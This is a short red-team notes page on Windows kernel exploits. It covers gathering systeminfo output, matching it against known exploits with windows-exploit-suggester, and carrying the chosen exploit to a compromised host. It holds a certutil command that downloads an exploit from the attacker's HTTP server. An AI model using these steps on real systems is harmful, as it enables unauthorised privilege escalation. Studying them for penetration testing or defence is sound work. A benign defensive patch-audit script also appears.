Kernel Exploits

What is a Kernel Exploit

A kernel exploit takes advantage of a vulnerability to let an attacker execute arbitrary code in the kernel mode of an operating system. The kernel is the central component of an operating system that manages the hardware and software resources of a computer. It is responsible for managing system resources such as memory, processors, and devices, and it provides the interface between the hardware and software of the system.

An attacker may attempt to exploit a vulnerability in the kernel of a Windows machine by checking the update version of the system and comparing it to a database to determine if it has been patched. If the system is not up to date with the latest patches, the attacker may attempt to use a known kernel exploit to gain elevated privileges on the system and potentially install malicious software or modify system settings.

Commands

Once you have compromised a Windows machine, check the system information:

systeminfo

Copy all of the output and paste it into a file named file.txt on your attacking machine (Linux).

Check patches & Vulnerabilities

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2022-...xlss --systeminfo file.txt

Output: [+] ---> Vulnerable [*] ---> Not Vulnerable

More information ---> [[Red Team/6 - Machine/3 - Active Directory/General/Tools/• Windows exploit suggester (NG)]]
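
The comparison described above (installed hotfixes from `systeminfo` checked against a list of expected patches) can also be run by defenders as a patch-gap audit. The following is an added example, not code from this page or from Windows Exploit Suggester; the sample output, the `REQUIRED_KBS` baseline and all KB numbers are constructed placeholders.

```python
import re

# Constructed sample of `systeminfo` output (not from a real host).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS-EXAMPLE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB9000001
                           [02]: KB9000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Ethernet Adapter KB9000002
"""

# Hypothetical baseline: OS build -> KBs the patch policy requires.
# The KB numbers are placeholders, not real Microsoft updates.
REQUIRED_KBS = {"19045": {"KB9000001", "KB9000002", "KB9000003"}}

FIELD = re.compile(r"^(\S[^:]*):\s*(.*)$")  # "Key:   value" starting at column 0
KB = re.compile(r"\bKB\d+\b", re.IGNORECASE)

def parse_systeminfo(text):
    """Return (fields, hotfixes); indented lines belong to the previous key."""
    fields, hotfixes, current = {}, set(), None
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            current = m.group(1).strip()
            fields[current] = m.group(2).strip()
        elif current and current.lower().startswith("hotfix") and line[:1].isspace():
            # Only collect KB ids listed under the Hotfix(s) section.
            hotfixes.update(k.upper() for k in KB.findall(line))
    return fields, hotfixes

def missing_patches(text, baseline=REQUIRED_KBS):
    """Compare installed hotfixes with the baseline for the host's build."""
    fields, installed = parse_systeminfo(text)
    build = re.search(r"Build (\d+)", fields.get("OS Version", ""))
    if not build or build.group(1) not in baseline:
        raise ValueError("no baseline for this OS build")
    return sorted(baseline[build.group(1)] - installed)

if __name__ == "__main__":
    print("Missing:", missing_patches(SAMPLE_SYSTEMINFO))
```

A KB reported as missing may be covered by a later cumulative update that supersedes it, so confirm the result against your patch management source.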

Transfer the exploit selected

# Attacking Machine
python3 -m http.server

# Target Machine
certutil -urlcache -f http://IP/exploit.exe newnameofexploit.exe